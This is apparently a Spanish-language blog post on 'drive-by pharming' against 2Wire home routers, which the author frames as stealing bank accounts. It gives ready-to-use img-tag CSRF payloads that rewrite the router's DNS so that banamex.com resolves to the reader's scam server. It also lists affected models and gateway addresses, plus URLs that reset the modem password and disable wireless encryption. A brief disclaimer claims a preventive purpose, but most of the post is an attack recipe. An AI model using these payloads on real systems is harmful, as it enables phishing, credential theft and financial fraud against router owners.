Driver by Pharmming "Robando cuentas de Bancos"


Antes que nada aclaro que la informaci��n expuesta es para la prevencion de ataques y no para mal uso por parte de los lectores.
Todo parte de una vulnerabilidad en los routers 2wire(usados por prodigy, telmex y todos los que usen telefono por internet).
Debido a que muchos empresarios usan internet de prodigy en sus laptops, con tan solo abrir su correo quedan infectadas y cada ves que vallan a la pagina indicada en el codigo del pharmming se redireccionara a la web que tu mismo eligiras (scam fake).

&img src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38" nextpage="J38_SET&NAME=" addr="127.0.0" />


1.- http://home/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=
Esto es el bug o vulnerabilidad que altera los routers 2wire.. lo cual se ignifica que automaticamente lo redireccionara a la web indicada.

2.- http://www.banamex.com/
Esa va ser la web la cual cada ves que abra http://www.banamex.com/ se redireccionara a tu SCAM

3.- =127.0.0
Alli va ir la ip de tu servidor dedicado.

Cabe aclarar que ese codigo puede utilizarse para spoofear varios sitios:
src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=127.0.0">
img src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&" nextpage="'J38_SET&NAME=" addr="127.0.0" />
img src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&" nextpage="'J38_SET&NAME=" addr="127.0.0" />
img src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&" nextpage="'J38_SET&NAME=" addr="127.0.0" />
img src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&" nextpage="'J38_SET&NAME=" addr="127.0.0" />

Los routers afectados son:
2Wire 2071 Gateway 5.29.51
2Wire 2071 Gateway 3.17.5
2Wire 2071 Gateway 3.7.1
2Wire 1800HW 5.29.51
2Wire 1800HW 3.17.5
2Wire 1800HW 3.7.1
2Wire 1701HG 5.29.51
2Wire 1701HG 3.17.5
2Wire 1701HG 3.7.1

No en todos funciona usando "home" ... puede ser:
http://home/
http://gateway.2wire.net/
http://192.168.1.254/
http://192.168.0.1/
http://172.16.0.1/

El bug tambi��n sirve para cambiar la password de el modem http://gateway.2wire.net/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS

Desactivar la autentificaci��n Wireles:
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0

PD: YA LLEGAMOS A LAS 10000 VISITAS MUCHAS GRACIAS!!!

Publicado por J. Federico Aguirre en 17:09